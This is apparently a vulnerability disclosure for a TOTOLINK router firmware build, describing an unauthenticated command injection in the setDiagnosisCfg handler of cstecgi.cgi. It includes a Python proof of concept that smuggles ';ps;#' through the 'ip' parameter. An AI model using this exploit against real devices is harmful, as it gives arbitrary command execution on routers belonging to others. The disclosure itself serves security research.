Vendor:http://totolink.net/
Firmware:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/204/ids/36.html
V9.3.5u.6139_B20201216
The following image displays the code for a command injection vulnerability in the setDiagnosisCfg handler function of cstecgi.cgi. The value of the ip parameter will be spliced into the ping %s -w ... and be excuted by doSystem function, which allows an attacker to excute any command. The vulnerability do not need authentication.
import requests
url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"
payload = """{
"topicurl": "setDiagnosisCfg",
"num": "123",
"ip": ";ps;#"
}"""
requests.request("POST", url, data=payload)
